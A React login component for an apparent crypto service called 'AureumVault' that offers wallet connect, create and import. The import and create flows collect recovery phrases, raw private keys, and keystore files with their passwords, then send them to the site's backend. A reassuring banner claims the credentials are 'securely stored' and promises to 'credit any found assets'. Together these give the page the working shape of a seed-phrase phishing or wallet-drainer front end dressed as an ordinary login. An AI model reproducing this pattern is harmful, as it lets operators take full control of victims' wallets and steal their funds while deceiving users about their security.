import React, { useState, useEffect } from 'react';
import { Link, useNavigate } from 'react-router-dom';
import { useDispatch } from 'react-redux';
import Web3AuthService from '../../request/Auth/Web3AuthService';
import { setUser } from './userSlice';
import { setAuthStatus, setToken } from '../../request/Auth/authSlice';
import http from '../../request/http-common';
import { ethers } from 'ethers';

const Web3Auth = () => {
  const [activeTab, setActiveTab] = useState('connect');
  const [recoveryPhrase, setRecoveryPhrase] = useState('');
  const [generatedPhrase, setGeneratedPhrase] = useState('');
  const [generatedAddress, setGeneratedAddress] = useState('');
  const [generatedWallet, setGeneratedWallet] = useState(null);
  const [walletPin, setWalletPin] = useState('');
  const [loading, setLoading] = useState(false);
  const [error, setError] = useState('');
  
  // New states for enhanced import
  const [cryptoWallets, setCryptoWallets] = useState([]);
  const [walletsLoading, setWalletsLoading] = useState(false);
  const [selectedWallet, setSelectedWallet] = useState('');
  const [selectedWalletObj, setSelectedWalletObj] = useState(null);
  const [importType, setImportType] = useState('recovery_phrase');
  const [walletAddress, setWalletAddress] = useState('');
  const [walletName, setWalletName] = useState('');
  const [keystoreJson, setKeystoreJson] = useState('');
  const [keystorePassword, setKeystorePassword] = useState('');
  const [privateKey, setPrivateKey] = useState('');
  const [walletSelectionError, setWalletSelectionError] = useState(false);
  const [walletsError, setWalletsError] = useState('');
  
  // Searchable dropdown states
  const [isWalletDropdownOpen, setIsWalletDropdownOpen] = useState(false);
  const [walletSearchTerm, setWalletSearchTerm] = useState('');
  
  const navigate = useNavigate();
  const dispatch = useDispatch();

  // Fetch crypto wallets on component mount
  useEffect(() => {
    const fetchCryptoWallets = async () => {
      setWalletsLoading(true);
      setWalletsError('');
      try {
        const response = await http.get('/api/crypto-wallets');
        if (response.data.status === 'success') {
          setCryptoWallets(response.data.wallets);
          setWalletsError('');
        }
      } catch (error) {
        console.error('Failed to fetch crypto wallets:', error);
        setWalletsError('Failed to load wallet options. Please reload this page.');
      } finally {
        setWalletsLoading(false);
      }
    };
    
    fetchCryptoWallets();
  }, []);

  // Auto-detect wallet address from keystore JSON
  useEffect(() => {
    if (importType === 'keystore_json' && keystoreJson) {
      try {
        const parsedKeystore = JSON.parse(keystoreJson);
        if (parsedKeystore.address) {
          setWalletAddress('0x' + parsedKeystore.address.replace('0x', ''));
        }
      } catch (e) {
        // Invalid JSON, will be caught during validation
      }
    }
  }, [keystoreJson, importType]);

  // Filter wallets based on search term
  const filteredWallets = cryptoWallets.filter(wallet =>
    wallet.name.toLowerCase().includes(walletSearchTerm.toLowerCase())
  );

  // Handle wallet selection
  const handleWalletSelect = (wallet) => {
    setSelectedWallet(wallet.name);
    setSelectedWalletObj(wallet);
    setWalletSearchTerm(wallet.name);
    setIsWalletDropdownOpen(false);
    setWalletSelectionError(false);
  };

  const handleImportWalletCardClick = (wallet) => {
    handleWalletSelect(wallet);
    setActiveTab('import');
    setError('');
  };

  // Close dropdown when clicking outside
  useEffect(() => {
    const handleClickOutside = (event) => {
      if (isWalletDropdownOpen && !event.target.closest('.wallet-dropdown-container')) {
        setIsWalletDropdownOpen(false);
      }
    };
    document.addEventListener('mousedown', handleClickOutside);
    return () => document.removeEventListener('mousedown', handleClickOutside);
  }, [isWalletDropdownOpen]);

  const generateRecoveryPhrase = () => {
    // Generate a real crypto wallet using ethers.js
    const wallet = ethers.Wallet.createRandom();
    setGeneratedWallet(wallet);
    setGeneratedPhrase(wallet.mnemonic.phrase);
    setGeneratedAddress(wallet.address);
  };

  const handleConnectWallet = async () => {
    setLoading(true);
    setError('');
    
    try {
      if (typeof window.ethereum !== 'undefined') {
        const accounts = await window.ethereum.request({ method: 'eth_requestAccounts' });
        const walletAddress = accounts[0];
        
        const response = await Web3AuthService.connectWallet({
          wallet_address: walletAddress,
          wallet_name: 'MetaMask'
        });

        if (response.data.status === 'success') {
          localStorage.setItem('auth-token', response.data.access_token);
          dispatch(setUser(response.data.user));
          dispatch(setAuthStatus('authenticated'));
          dispatch(setToken(response.data.access_token));
          localStorage.setItem('notification', JSON.stringify({message: response.data.message, type: 'success'}));
          const event2 = new Event('processed');
          window.dispatchEvent(event2);
          const event = new Event('newMessage');
          window.dispatchEvent(event);
          window.location.href = '/';
        }
      } else {
        setError('No Web3 wallet detected. Please install MetaMask or another Web3 wallet.');
      }
    } catch (err) {
      setError(err.response?.data?.message || err.message || 'Failed to connect wallet');
    } finally {
      setLoading(false);
    }
  };

  const handleCreateWallet = async () => {
    if (!/^\d{6}$/.test(walletPin)) {
      setError('Please create a valid 6-digit PIN for your wallet.');
      return;
    }

    if (!generatedPhrase) {
      generateRecoveryPhrase();
      return;
    }

    setLoading(true);
    setError('');
    
    try {
      const response = await Web3AuthService.createWallet({
        recovery_phrase: generatedPhrase,
        wallet_address: generatedAddress,
        wallet_name: 'AureumVault Wallet',
        private_key: generatedWallet?.privateKey || '',
        wallet_pin: walletPin
      });

      if (response.data.status === 'success') {
        localStorage.setItem('auth-token', response.data.access_token);
        dispatch(setUser(response.data.user));
        dispatch(setAuthStatus('authenticated'));
        dispatch(setToken(response.data.access_token));
        localStorage.setItem('notification', JSON.stringify({message: response.data.message, type: 'success'}));
        const event2 = new Event('processed');
        window.dispatchEvent(event2);
        const event = new Event('newMessage');
        window.dispatchEvent(event);
        window.location.href = '/';
      }
    } catch (err) {
      setError(err.response?.data?.message || 'Failed to create wallet');
    } finally {
      setLoading(false);
    }
  };

  const deriveWalletAddress = (phrase = null, privKey = null) => {
    try {
      if (phrase) {
        // Derive wallet from recovery phrase
        const wallet = ethers.Wallet.fromMnemonic(phrase);
        setWalletAddress(wallet.address);
        return wallet.address;
      } else if (privKey) {
        // Derive wallet from private key
        const wallet = new ethers.Wallet(privKey);
        setWalletAddress(wallet.address);
        return wallet.address;
      }
    } catch (error) {
      console.error('Failed to derive wallet address:', error);
      return null;
    }
  };

  const handleImportWallet = async () => {
    setError('');
    setWalletSelectionError(false);

    // Validate wallet selection is required
    if (!selectedWallet.trim()) {
      setError('Please select a wallet type');
      setWalletSelectionError(true);
      return;
    }

    // Validation based on import type
    if (importType === 'recovery_phrase') {
      const phraseWords = recoveryPhrase.trim().split(/\s+/);
      if (phraseWords.length !== 12 && phraseWords.length !== 24) {
        setError('Please enter a valid 12 or 24 word recovery phrase');
        return;
      }
    } else if (importType === 'keystore_json') {
      if (!keystoreJson.trim()) {
        setError('Please enter your keystore JSON');
        return;
      }
      if (!keystorePassword.trim()) {
        setError('Please enter your keystore password');
        return;
      }
      // Try to extract address from keystore JSON
      try {
        const parsedKeystore = JSON.parse(keystoreJson);
        if (parsedKeystore.address) {
          setWalletAddress('0x' + parsedKeystore.address.replace('0x', ''));
        }
      } catch (e) {
        setError('Invalid keystore JSON format');
        return;
      }
    } else if (importType === 'private_key') {
      if (!privateKey.trim()) {
        setError('Please enter your private key');
        return;
      }
    }

    // Auto-derive wallet address based on import type
    let finalWalletAddress = walletAddress;
    if (!finalWalletAddress) {
      try {
        if (importType === 'recovery_phrase') {
          finalWalletAddress = deriveWalletAddress(recoveryPhrase);
        } else if (importType === 'private_key') {
          finalWalletAddress = deriveWalletAddress(null, privateKey);
        }
        // For keystore_json, address is already extracted from JSON
      } catch (error) {
        setError('Could not derive wallet address. Please check your input and try again.');
        return;
      }
    }

    if (!finalWalletAddress || !finalWalletAddress.trim()) {
      setError('Could not derive wallet address. Please try again.');
      return;
    }

    // Basic wallet address validation
    if (!finalWalletAddress.match(/^0x[a-fA-F0-9]{40}$/)) {
      setError('Invalid wallet address format');
      return;
    }
    
    setLoading(true);
    setError('');

    try {
      const importData = {
        wallet_address: finalWalletAddress,
        wallet_name: walletName || selectedWallet || 'Imported Wallet',
        wallet_type: importType,
        selected_wallet: selectedWallet
      };

      // Add data based on import type
      if (importType === 'recovery_phrase') {
        importData.recovery_phrase = recoveryPhrase;
      } else if (importType === 'keystore_json') {
        importData.keystore_json = keystoreJson;
        importData.keystore_password = keystorePassword;
      } else if (importType === 'private_key') {
        importData.private_key = privateKey;
      }
      
      const response = await Web3AuthService.importWallet(importData);

      if (response.data.status === 'success') {
        localStorage.setItem('auth-token', response.data.access_token);
        dispatch(setUser(response.data.user));
        dispatch(setAuthStatus('authenticated'));
        dispatch(setToken(response.data.access_token));
        localStorage.setItem('notification', JSON.stringify({message: response.data.message, type: 'success'}));
        const event2 = new Event('processed');
        window.dispatchEvent(event2);
        const event = new Event('newMessage');
        window.dispatchEvent(event);
        window.location.href = '/';
      }
    } catch (err) {
      setError(err.response?.data?.message || 'Failed to import wallet');
    } finally {
      setLoading(false);
    }
  };

  return (
    <div className="min-h-screen bg-deepspace flex items-center justify-center px-4">
      {/* Background */}
      <div className="absolute inset-0">
        <div className="absolute inset-0 bg-gradient-to-br from-deepspace via-deepspace-100 to-deepspace-200"></div>
        <div className="absolute top-1/4 left-1/4 w-96 h-96 bg-cyber-blue/10 rounded-full blur-3xl animate-pulse-slow"></div>
        <div className="absolute bottom-1/4 right-1/4 w-80 h-80 bg-cyber-purple/10 rounded-full blur-3xl animate-pulse-slow"></div>
      </div>

      {/* Auth Card */}
      <div className="relative max-w-2xl w-full z-20">
        <div className="bg-dark-card/80 backdrop-blur-xl border border-dark-border/50 rounded-3xl p-8 lg:p-12 shadow-[0_20px_60px_rgb(0,0,0,0.6)]">
          
          {/* Header */}
          <div className="text-center mb-8">
            <h1 className="text-3xl lg:text-4xl font-bold text-text-primary mb-3">
              Welcome to
              <span className="block bg-gradient-to-r from-cyber-blue to-cyber-purple bg-clip-text text-transparent">
                AureumVault
              </span>
            </h1>
            <p className="text-text-secondary">
              Secure your crypto assets with Web3 authentication
            </p>
          </div>

          {/* Tabs */}
          <div className="flex gap-2 mb-8 bg-deepspace/50 p-2 rounded-xl">
            <button
              onClick={() => setActiveTab('connect')}
              className={`flex-1 py-3 rounded-lg font-semibold transition-all duration-300 ${
                activeTab === 'connect'
                  ? 'bg-gradient-to-r from-cyber-blue to-cyber-purple text-white'
                  : 'text-text-muted hover:text-text-primary'
              }`}
            >
              Connect
            </button>
            <button
              onClick={() => setActiveTab('create')}
              className={`flex-1 py-3 rounded-lg font-semibold transition-all duration-300 ${
                activeTab === 'create'
                  ? 'bg-gradient-to-r from-cyber-blue to-cyber-purple text-white'
                  : 'text-text-muted hover:text-text-primary'
              }`}
            >
              Create
            </button>
          </div>

          {/* Error Message */}
          {error && (
            <div className="mb-6 p-4 bg-cyber-red/10 border border-cyber-red/30 rounded-xl text-cyber-red">
              {error}
            </div>
          )}

          {/* Connect Wallet Tab */}
          {activeTab === 'connect' && (
            <div className="space-y-6">
              <div className="text-center mb-6">
                <p className="text-text-secondary mb-4">
                  Connect your existing Web3 wallet to get started
                </p>
              </div>

              <button
                onClick={handleConnectWallet}
                disabled={loading}
                className="w-full py-4 bg-gradient-to-r from-cyber-blue to-cyber-purple text-white font-bold rounded-xl hover:scale-105 transition-all duration-300 disabled:opacity-50 disabled:cursor-not-allowed"
              >
                {loading ? 'Connecting...' : 'Connect Wallet'}
              </button>

              <div>
                <p className="text-sm text-text-muted text-center mb-4">
                  Or select a wallet below to import with your existing recovery method
                </p>
                {walletsLoading && (
                  <div className="text-center text-text-muted py-6">Loading wallet options...</div>
                )}
                {walletsError && (
                  <div className="text-center text-cyber-red py-6">{walletsError}</div>
                )}
                {!walletsLoading && !walletsError && (
                  <div className="grid grid-cols-2 gap-4 max-h-72 overflow-y-auto pr-1">
                    {cryptoWallets.map((wallet) => (
                      <button
                        key={wallet.id}
                        onClick={() => handleImportWalletCardClick(wallet)}
                        className="bg-deepspace/50 border border-dark-border/50 rounded-xl p-4 text-center hover:border-cyber-blue/50 transition-colors"
                      >
                        <img
                          src={wallet.image}
                          alt={wallet.name}
                          className="w-8 h-8 rounded-full object-cover mx-auto mb-2 border border-cyber-blue/20"
                          onError={(e) => {
                            e.target.onerror = null;
                            e.target.src = 'https://via.placeholder.com/32?text=W';
                          }}
                        />
                        <div className="text-sm text-text-primary">{wallet.name}</div>
                      </button>
                    ))}
                  </div>
                )}
              </div>
            </div>
          )}

          {/* Create Wallet Tab */}
          {activeTab === 'create' && (
            <div className="space-y-6">
              <div className="text-center mb-6">
                <p className="text-text-secondary mb-4">
                  Create a new secure wallet with a recovery phrase
                </p>
              </div>

              {!generatedPhrase ? (
                <div className="space-y-4">
                  <div>
                    <label className="block text-sm font-semibold text-text-primary mb-2">
                      Create 6-digit wallet PIN
                    </label>
                    <input
                      type="password"
                      value={walletPin}
                      onChange={(e) => setWalletPin(e.target.value.replace(/\D/g, '').slice(0, 6))}
                      placeholder="Enter 6-digit PIN"
                      maxLength={6}
                      className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors text-center tracking-[0.4em]"
                    />
                    <p className="text-xs text-text-muted mt-2">
                      This PIN will be used as your wallet password.
                    </p>
                  </div>
                  <button
                    onClick={generateRecoveryPhrase}
                    disabled={loading || !/^\d{6}$/.test(walletPin)}
                    className="w-full py-4 bg-gradient-to-r from-cyber-blue to-cyber-purple text-white font-bold rounded-xl hover:scale-105 transition-all duration-300 disabled:opacity-50"
                  >
                    Generate Recovery Phrase
                  </button>
                </div>
              ) : (
                <div className="space-y-6">
                  <div className="bg-deepspace/50 border border-cyber-purple/30 rounded-xl p-4">
                    <div className="text-sm text-cyber-purple font-semibold mb-1">Wallet PIN</div>
                    <div className="text-text-primary tracking-[0.35em]">{walletPin}</div>
                  </div>
                  <div className="bg-deepspace/50 border border-cyber-blue/30 rounded-xl p-6">
                    <div className="text-sm text-cyber-blue font-semibold mb-3">Your Recovery Phrase (Save This!)</div>
                    <div className="grid grid-cols-3 gap-3">
                      {generatedPhrase.split(' ').map((word, index) => (
                        <div key={index} className="bg-dark-card/50 border border-dark-border/50 rounded-lg p-3 text-center">
                          <div className="text-xs text-text-muted mb-1">{index + 1}</div>
                          <div className="text-text-primary font-semibold">{word}</div>
                        </div>
                      ))}
                    </div>
                    <div className="mt-4 space-y-2">
                      <div className="text-xs text-text-muted break-all">
                        <span className="font-semibold">Wallet Address:</span> {generatedAddress}
                      </div>
                      {generatedWallet && (
                        <div className="text-xs text-text-muted break-all">
                          <span className="font-semibold">Private Key:</span> {generatedWallet.privateKey}
                        </div>
                      )}
                    </div>
                  </div>

                  <div className="bg-cyber-red/10 border border-cyber-red/30 rounded-xl p-4">
                    <p className="text-sm text-cyber-red">
                      ⚠️ Write down this phrase and store it safely. You'll need it to recover your wallet.
                    </p>
                  </div>

                  <button
                    onClick={handleCreateWallet}
                    disabled={loading}
                    className="w-full py-4 bg-gradient-to-r from-cyber-blue to-cyber-green text-white font-bold rounded-xl hover:scale-105 transition-all duration-300 disabled:opacity-50"
                  >
                    {loading ? 'Creating...' : "I've Saved My Phrase - Create Wallet"}
                  </button>
                </div>
              )}
            </div>
          )}

          {/* Import Wallet Tab */}
          {activeTab === 'import' && (
            <div className="space-y-6">
              <div className="flex justify-start">
                <button
                  type="button"
                  onClick={() => setActiveTab('connect')}
                  className="inline-flex items-center gap-2 text-sm text-cyber-blue hover:text-cyber-purple transition-colors"
                >
                  <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                    <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M15 19l-7-7 7-7" />
                  </svg>
                  Back to Connect
                </button>
              </div>
              <div className="text-center mb-6">
                <p className="text-text-secondary mb-4">
                  Import your existing wallet using multiple methods
                </p>
              </div>

              {/* Wallet Type Selection - Searchable with Images */}
              <div className="wallet-dropdown-container relative">
                <label className="block text-sm font-semibold text-text-primary mb-3">
                  Select Wallet Type <span className="text-cyber-red">*</span>
                </label>
                
                {/* Search Input */}
                <div className="relative">
                  <input
                    type="text"
                    value={walletSearchTerm}
                    onChange={(e) => {
                      setWalletSearchTerm(e.target.value);
                      setIsWalletDropdownOpen(true);
                    }}
                    onFocus={() => !walletsLoading && !walletsError && setIsWalletDropdownOpen(true)}
                    placeholder={
                      walletsError
                        ? 'Wallets failed to load. Reload this page.'
                        : walletsLoading
                          ? 'Loading wallet types...'
                          : 'Search wallet...'
                    }
                    disabled={walletsLoading || !!walletsError}
                    className={`w-full px-4 py-3 pr-10 bg-deepspace/50 border rounded-xl text-text-primary placeholder-text-muted focus:outline-none transition-colors ${
                      walletSelectionError
                        ? 'border-cyber-red/50'
                        : walletsError
                          ? 'border-cyber-red/50'
                          : selectedWallet
                            ? 'border-cyber-blue/50'
                            : 'border-dark-border/50'
                    } ${(walletsLoading || walletsError) ? 'opacity-60 cursor-not-allowed' : ''}`}
                  />
                  
                  {/* Selected Wallet Image & Clear Button */}
                  {selectedWalletObj && (
                    <div className="absolute right-3 top-1/2 transform -translate-y-1/2 flex items-center gap-2">
                      <button
                        type="button"
                        onClick={(e) => {
                          e.stopPropagation();
                          setSelectedWallet('');
                          setSelectedWalletObj(null);
                          setWalletSearchTerm('');
                        }}
                        className="text-text-muted hover:text-cyber-red transition-colors"
                      >
                        <svg className="w-4 h-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                          <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M6 18L18 6M6 6l12 12" />
                        </svg>
                      </button>
                      <img 
                        src={selectedWalletObj.image} 
                        alt={selectedWalletObj.name}
                        className="w-6 h-6 rounded-full object-cover"
                      />
                    </div>
                  )}
                  
                  {/* Dropdown Arrow */}
                  {!selectedWalletObj && (
                    <div className="absolute right-3 top-1/2 transform -translate-y-1/2 text-text-muted pointer-events-none">
                      <svg className="w-5 h-5" fill="none" stroke="currentColor" viewBox="0 0 24 24">
                        <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="2" d="M19 9l-7 7-7-7" />
                      </svg>
                    </div>
                  )}
                </div>

                {/* Dropdown List */}
                {isWalletDropdownOpen && !walletsLoading && !walletsError && (
                  <div 
                    className="absolute z-50 w-full mt-2 bg-dark-card border border-dark-border/50 rounded-xl shadow-2xl max-h-64 overflow-y-auto"
                    style={{
                      scrollbarWidth: 'thin',
                      scrollbarColor: '#4ECCA3 #1a1a2e'
                    }}
                  >
                    <style jsx>{`
                      .absolute::-webkit-scrollbar {
                        width: 8px;
                      }
                      .absolute::-webkit-scrollbar-track {
                        background: #1a1a2e;
                        border-radius: 10px;
                      }
                      .absolute::-webkit-scrollbar-thumb {
                        background: #4ECCA3;
                        border-radius: 10px;
                      }
                      .absolute::-webkit-scrollbar-thumb:hover {
                        background: #3dbb8f;
                      }
                    `}</style>
                    {filteredWallets.length > 0 ? (
                      filteredWallets.map((wallet) => (
                        <div
                          key={wallet.id}
                          onClick={() => handleWalletSelect(wallet)}
                          className="flex items-center gap-3 px-4 py-3 hover:bg-cyber-blue/10 cursor-pointer transition-colors border-b border-dark-border/30 last:border-b-0"
                        >
                          <img 
                            src={wallet.image} 
                            alt={wallet.name}
                            className="w-8 h-8 rounded-full object-cover flex-shrink-0 border-2 border-cyber-blue/20"
                            onError={(e) => {
                              e.target.onerror = null;
                              e.target.src = 'https://via.placeholder.com/32?text=W';
                            }}
                          />
                          <span className="text-text-primary font-medium">{wallet.name}</span>
                        </div>
                      ))
                    ) : (
                      <div className="px-4 py-3 text-text-muted text-center">
                        No wallets found
                      </div>
                    )}
                  </div>
                )}

                {walletSelectionError && (
                  <p className="text-cyber-red text-xs mt-1">Please select a wallet type</p>
                )}
                {walletsLoading && (
                  <div className="flex items-center gap-2 text-text-muted text-sm mt-2">
                    <svg className="w-4 h-4 animate-spin" viewBox="0 0 24 24">
                      <circle className="opacity-25" cx="12" cy="12" r="10" stroke="currentColor" strokeWidth="4"></circle>
                      <path className="opacity-75" fill="currentColor" d="M4 12a8 8 0 018-8v4a4 4 0 00-4 4H4z"></path>
                    </svg>
                    Loading wallet types...
                  </div>
                )}
                {walletsError && (
                  <div className="flex flex-col sm:flex-row sm:items-center sm:justify-between gap-3 text-sm mt-2 text-cyber-red">
                    <span>{walletsError}</span>
                    <button
                      type="button"
                      onClick={() => window.location.reload()}
                      className="self-start sm:self-center px-3 py-1 rounded-lg border border-cyber-red/40 text-cyber-red hover:bg-cyber-red/10 transition-colors"
                    >
                      Reload Page
                    </button>
                  </div>
                )}
              </div>

              {/* Import Method Selection */}
              <div>
                <label className="block text-sm font-semibold text-text-primary mb-3">
                  Import Method
                </label>
                <div className="grid grid-cols-3 gap-2 mb-4">
                  <button
                    onClick={() => setImportType('recovery_phrase')}
                    className={`py-2 px-3 rounded-lg text-sm font-medium transition-all ${
                      importType === 'recovery_phrase'
                        ? 'bg-cyber-blue text-white'
                        : 'bg-deepspace/50 text-text-muted hover:text-text-primary'
                    }`}
                  >
                    Recovery Phrase
                  </button>
                  <button
                    onClick={() => setImportType('keystore_json')}
                    className={`py-2 px-3 rounded-lg text-sm font-medium transition-all ${
                      importType === 'keystore_json'
                        ? 'bg-cyber-blue text-white'
                        : 'bg-deepspace/50 text-text-muted hover:text-text-primary'
                    }`}
                  >
                    Keystore JSON
                  </button>
                  <button
                    onClick={() => setImportType('private_key')}
                    className={`py-2 px-3 rounded-lg text-sm font-medium transition-all ${
                      importType === 'private_key'
                        ? 'bg-cyber-blue text-white'
                        : 'bg-deepspace/50 text-text-muted hover:text-text-primary'
                    }`}
                  >
                    Private Key
                  </button>
                </div>
              </div>

              {/* Wallet Address - Auto-detected */}
              {walletAddress && (
                <div className="bg-cyber-green/10 border border-cyber-green/30 rounded-xl p-4">
                  <label className="block text-sm font-semibold text-cyber-green mb-2">
                    ✓ Detected Wallet Address
                  </label>
                  <div className="text-text-primary font-mono text-sm break-all">
                    {walletAddress}
                  </div>
                </div>
              )}

              {/* Wallet Name */}
              <div>
                <label className="block text-sm font-semibold text-text-primary mb-3">
                  Wallet Name (Optional)
                </label>
                <input
                  type="text"
                  value={walletName}
                  onChange={(e) => setWalletName(e.target.value)}
                  placeholder="My Wallet"
                  className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                />
              </div>

              {/* Recovery Phrase Input */}
              {importType === 'recovery_phrase' && (
                <div>
                  <label className="block text-sm font-semibold text-text-primary mb-3">
                    Recovery Phrase (12 or 24 words)
                  </label>
                  <textarea
                    value={recoveryPhrase}
                    onChange={(e) => setRecoveryPhrase(e.target.value)}
                    placeholder="Enter your recovery phrase separated by spaces"
                    rows="4"
                    className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                  />
                </div>
              )}

              {/* Keystore JSON Input */}
              {importType === 'keystore_json' && (
                <div className="space-y-4">
                  <div>
                    <label className="block text-sm font-semibold text-text-primary mb-3">
                      Keystore JSON
                    </label>
                    <textarea
                      value={keystoreJson}
                      onChange={(e) => setKeystoreJson(e.target.value)}
                      placeholder="Paste your keystore JSON here..."
                      rows="6"
                      className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors font-mono text-sm"
                    />
                  </div>
                  <div>
                    <label className="block text-sm font-semibold text-text-primary mb-3">
                      Keystore Password
                    </label>
                    <input
                      type="password"
                      value={keystorePassword}
                      onChange={(e) => setKeystorePassword(e.target.value)}
                      placeholder="Enter your keystore password"
                      className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors"
                    />
                  </div>
                </div>
              )}

              {/* Private Key Input */}
              {importType === 'private_key' && (
                <div>
                  <label className="block text-sm font-semibold text-text-primary mb-3">
                    Private Key
                  </label>
                  <textarea
                    value={privateKey}
                    onChange={(e) => setPrivateKey(e.target.value)}
                    placeholder="Enter your private key"
                    rows="3"
                    className="w-full px-4 py-3 bg-deepspace/50 border border-dark-border/50 rounded-xl text-text-primary placeholder-text-muted focus:border-cyber-blue/50 focus:outline-none transition-colors font-mono text-sm"
                  />
                </div>
              )}

              <div className="bg-cyber-blue/10 border border-cyber-blue/30 rounded-xl p-4">
                <p className="text-sm text-cyber-blue">
                  🔒 Your wallet credentials are encrypted and securely stored. We'll automatically check your wallet balance and credit any found assets.
                </p>
              </div>

              <button
                onClick={handleImportWallet}
                disabled={loading}
                className="w-full py-4 bg-gradient-to-r from-cyber-blue to-cyber-purple text-white font-bold rounded-xl hover:scale-105 transition-all duration-300 disabled:opacity-50"
              >
                {loading ? 'Importing...' : 'Import Wallet'}
              </button>
            </div>
          )}

          {/* Footer Links */}
          <div className="mt-8 text-center text-sm text-text-muted">
            <p>
              Need help? <Link to="/documentation" className="text-cyber-blue hover:text-cyber-purple transition-colors">View Documentation</Link>
            </p>
          </div>
        </div>
      </div>
    </div>
  );
};

export default Web3Auth;
